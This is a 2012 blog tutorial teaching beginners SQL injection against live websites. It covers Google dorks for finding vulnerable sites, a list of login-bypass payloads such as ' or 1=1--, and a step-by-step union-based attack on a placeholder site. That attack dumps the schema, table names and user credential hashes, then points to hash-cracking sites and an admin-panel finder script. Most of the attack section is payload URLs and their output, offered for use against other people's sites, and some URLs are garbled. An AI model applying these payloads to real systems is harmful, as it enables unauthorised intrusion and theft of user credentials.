Wednesday, 9 May 2012

Basic SQL Injection Tutorial

What is SQL injection?
SQL injection is used to exploit and extract data from website.Using SQL injection attacker can extract data like Admin login information,credit cards details,emails,phone no,address,name etc.
SQL - Structured Query Language
SQL is a programming language use to communicate and manage database.
If this doesn't satisfy your curiosity then here's a link to Wikipedia.

let's start a real stuff...!!


Finding Vulnerable Website Using Dorks
Dorks list -- by SideSwipe.
Just copy one Dork for eg- inurl:index.php?id= and Google it.



Gaining Access to Administrator Account Using Quries
inurl:admin.php Search it using Google.Choose any of the Dork Listed in the search Result by Google.
' or 'x'='x use this in admin and password boxes.
Username:' or 'x'='x
Password:' or 'x'='x
 

you can also try following queries:
') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

Normal/UNION Based SQL Injection 
Checking Vulnerability
Target: 
http://www.targetsite.com/pages.php?id=2 
Add ' (apostrophe) at the end of link 
http://www.targetsite.com/pages.php?id=2'  
following error will occur:
You have an error in your SQL syntax;check the manual corresponds to your MySQL server version  for the right syntax to use near '\" at line 1
If website loaded as it is without error or unharmed then website is not vulnerable to SQL injection.If it gives error we can move further otherwise you can select another website.

Finding Number Of Columns
http://www.targetsite.com/pages.php?id=2+order+by+1--  NO ERROR
http://www.
targetsite.com/pages.php?id=2+order+by+2--  NO ERROR
http://www.
targetsite.com/pages.php?id=2+order+by+3--  NO ERROR
http://www.
targetsite.com/pages.php?id=2+order+by+4--  NO ERROR
http://www.
/pages.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--  .com/pages.php?id=2+order+by+5--  NO ERROR  
Keep increasing number till we get an error.
Don't forget to add --(two hypen) at the end of link.
 
http://www.targetsite.com/pages.php?id=2+order+by+15--  ERROR 
finally we got error at order+by+15--. It means that our website contain 14 columns.

Determining Vulnerable Columns
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--   
OR
http://www.targetsite.com/pages.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--  
Don't forget to add - (hyphen) after id= . If you are using id=null+union+select.. then there is no need to add -(hyphen) after id= 
It will display vulnerable columns.It displays column number 4 is vulnerable.
we will use vulnerable column to extract data from website.

Determining Mysql Version
It is easy to find Mysql version.Replace vulnerable column with
@@version 
OR
version() 
we got column number 4 vulnerable so we will replace column number 4 with @@version.
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14-- 
We got mysql version
5.1.61-community-log
If you got mysql version less than 5 then you have to use error based SQL injection.I am not going to explain error based SQL injection.so leave that website and choose another.let's move further..

Finding Database
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14+from+inf ​ormation_schema.schemata-- 

information_schema contains metadata.Metadata is data about other data such as tables and columns.
information_schema.schemata contains name of all databases.
we got names of database information_schema,site_target

Finding Tables
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()--
  
This will display tables. 
 It is not in proper manner.we need to bring them in proper manner so we can observe them clearly.
just add 0x0a after table_name
0x0a means new line.

http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(table_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.tables+where+table_schema=database()-- 
Don't forget to add , between 0x0a and table_name

we got following tables:  
tblgroup
,tblimages
,tblmaincategory
,tbloption
,tbloptionname
,tblorderdetails
,tblorders
,tblpage
,tblpagename
,tblpics
,tblproducts
,tblrelated
,tblsitemap
,tblstate
,tblsubcategory
,tbltemp
,tbltempoption
,tbltempoptionname
,tbltemppics
,tblusers
our goal is to get admin username and password.so we are going to extract columns from tblusers.
 
Finding Columns
www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(column_name,0x0a),5,6,7,8,9,10,11,12,13,14+
from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114​,115)-- 
we need to convert our table name into ASCII value.
String - ASCII, HEX, Binary Converter
we got columns from tblusers.

UserId,UserName,UserPwd  
 
Extracting Data From Columns
http://www.targetsite.com/pages.php?id=-2+union+select+1,2,3,group_concat(UserId,0x3a,UserName,0x3a,UserPwd,0x0a),5,6,7,8,9,10,11,12,13,14+from+tblusers--  10,11,12,13,14+from+tblusers-- 
here 0x3a separates UserId,UserName,UserPwd from each other.0x3a is converted into : (colon).

3:samplehash:1b4ea4c5cc5181229340c1c188baad6f
,4:samplehash:27b811b22de87faa7925ae3c2a0337fe
,19:samplehash:416947dc3ddd5871659ee142273ffa95
:0,20:samplehash:043d9d7cd5afa18257b77164bc91205e
Finally we got usernames and passwords.
password are not in plain text they are in encrypted form.we need to decrypt them.

Admin Login Page:
http://www.targetsite.com/admin/index.php

Cracking Hashes
·  http://www.md5decrypter.co.uk
·  http://www.md5crack.com/


Finding Admin Login Page
Online Admin login panel finder
Perl Script
Requirements:
Download ActivePerl and install
Admins.pl
open CMD and navigate to admins.pl or simply double click on admins.pl file.
now enter name of your targeted site and press enter
eg:http://www.targetsite.com
type coding language of your website such as php,asp.If you don't know coding language then type any and press enter It will begin scanning for Admin Control Panel.
 
    Thank you for reading tutorial.
Please post comments and let me know how was tutorial. This TUT is the result of my friends hardwork & credits goes to Mst. Suved